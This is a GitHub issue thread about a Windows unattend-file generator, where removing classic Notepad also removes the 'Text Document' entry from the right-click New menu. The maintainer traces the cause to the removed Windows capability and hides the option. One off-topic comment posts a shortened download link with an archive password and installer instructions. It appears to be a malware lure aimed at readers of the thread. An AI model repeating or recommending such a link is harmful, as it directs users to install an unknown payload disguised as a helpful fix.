### ISSUE TITLE
Unable to create file after uninstalling NotePad

### ISSUE THREAD

**Issue by SkyOps117** [cschneegans/unattend-generator#40]
After deinstalling all apps with this tool, I could not create a file with the right click context menu.
Enabling NotePad (Classic) fixed it by my guess.
Tested this on Windows 10 only.

**Comment by GoldenCaterpie** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by cschneegans** [comment]
I can reproduce your findings, i.e. the _New_ context menu does no longer show the _Text Document_ entry:

![image](https://github.com/user-attachments/assets/bda716db-8cad-4c8e-9491-4185c07f073b)

However, there is nothing in my code that would remove the registry key `HKEY_CLASSES_ROOT\.txt\ShellNew`, which produces this menu entry. When you choose to select _Notepad (classic)_, I simply call the `Remove-WindowsCapability` cmdlet.

It seems that this registry key somehow belongs to this capability, so they are removed together. I don't see that there is anything wrong with my generator or with Windows.

**Comment by SkyOps117** [comment]
Ok sorry I though that could help some. Maybe adding a note * in the generator on notepad.
By the way, your generator is awesome. The best way I found to unbloat Windows so far.

**Comment by cschneegans** [comment]
I have now hidden the checkbox for **Notepad (classic)** from the form since I believe there is very little reason to ever remove classic Notepad. [Existing links](https://schneegans.de/windows/unattend-generator/?LanguageMode=Unattended&UILanguage=en-US&Locale=en-US&Keyboard=00000409&GeoLocation=244&ProcessorArchitecture=amd64&ComputerNameMode=Random&CompactOsMode=Default&TimeZoneMode=Implicit&PartitionMode=Interactive&WindowsEditionMode=Unattended&WindowsEdition=pro&UserAccountMode=Unattended&AccountName0=Admin&AccountPassword0=&AccountGroup0=Administrators&AccountName1=User&AccountPassword1=&AccountGroup1=Users&AccountName2=&AccountName3=&AccountName4=&AutoLogonMode=Own&PasswordExpirationMode=Unlimited&LockoutMode=Default&HideFiles=Hidden&TaskbarSearch=Box&WifiMode=Interactive&ExpressSettings=DisableAll&KeysMode=Skip&ColorMode=Default&WallpaperMode=Default&RemoveNotepadClassic=true&RemoveNotepad=true&StartTilesMode=Default&StartPinsMode=Empty&WdacMode=Skip) that have selected classic Notepad for removal will still work.

**Comment by SkyOps117** [comment]
Thank you for a follow up 😀
~
Side comment: 2.9g in RAM after starting Windows instead of way more RAM normally. This tool is great for gaming.
